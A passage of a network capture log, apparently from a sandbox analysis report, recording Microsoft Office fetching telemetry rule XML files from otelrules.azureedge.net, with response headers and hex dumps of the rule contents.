                                                                                                                                                      x-azure-ref: 20241204T125941Z-1746fd949bd6zq92hC1EWRry48000000014000000000aeey
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:41 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      118192.168.2.44988413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:40 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:41 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1358
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                      ETag: "0x8DC582BE022ECC5"
                                                                                                                                                      x-ms-request-id: 76609676-a01e-0070-74cc-45573b000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125941Z-1746fd949bddtfvqhC1EWRxbpg0000000140000000008w4r
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:41 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      119192.168.2.44988513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:41 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:41 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1389
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                      ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                      x-ms-request-id: 1a13e7cb-001e-0049-3bcd-455bd5000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125941Z-1746fd949bdl6zq5hC1EWRf3ws00000000ug00000000amqv
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:41 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      120192.168.2.44988613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:41 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:41 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1352
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                      ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                      x-ms-request-id: 88657856-001e-008d-2ccc-45d91e000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125941Z-1746fd949bddgsvjhC1EWRum2c00000001h0000000005tsx
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:41 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      121192.168.2.44988713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:42 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:42 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1405
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                      ETag: "0x8DC582BE12B5C71"
                                                                                                                                                      x-ms-request-id: c77b1400-401e-0048-71d2-450409000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125942Z-1746fd949bdnq7x2hC1EWRpxr000000000z000000000b6kg
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:43 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      122192.168.2.44988813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:43 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:43 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1368
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                      ETag: "0x8DC582BDDC22447"
                                                                                                                                                      x-ms-request-id: 4edcd523-801e-0047-60d3-457265000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125943Z-1746fd949bdhk6hphC1EWRaw3c00000000x000000000ahu1
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:43 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      123192.168.2.44988913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:43 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:43 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1401
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                      ETag: "0x8DC582BE055B528"
                                                                                                                                                      x-ms-request-id: d3398a04-c01e-007a-0bce-45b877000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125943Z-1746fd949bdmv56chC1EWRypnn000000018g00000000auct
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:43 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      124192.168.2.44989013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:43 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:43 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1364
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                      ETag: "0x8DC582BE1223606"
                                                                                                                                                      x-ms-request-id: 4ddf438b-c01e-0049-57cd-45ac27000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125943Z-1746fd949bdlnsqphC1EWRurw00000000120000000008de2
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:43 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      125192.168.2.44989113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:43 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:43 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1397
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                      ETag: "0x8DC582BE7262739"
                                                                                                                                                      x-ms-request-id: c8e56ad6-f01e-005d-13cc-4513ba000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125943Z-1746fd949bd6zq92hC1EWRry48000000013g00000000aktz
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:44 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      126192.168.2.44989313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:45 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:45 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1403
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                      ETag: "0x8DC582BDCB4853F"
                                                                                                                                                      x-ms-request-id: e40b0455-101e-008e-19d2-45cf88000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125945Z-1746fd949bddgsvjhC1EWRum2c00000001f0000000008r2h
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:45 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      127192.168.2.44989413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:45 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:45 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1366
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
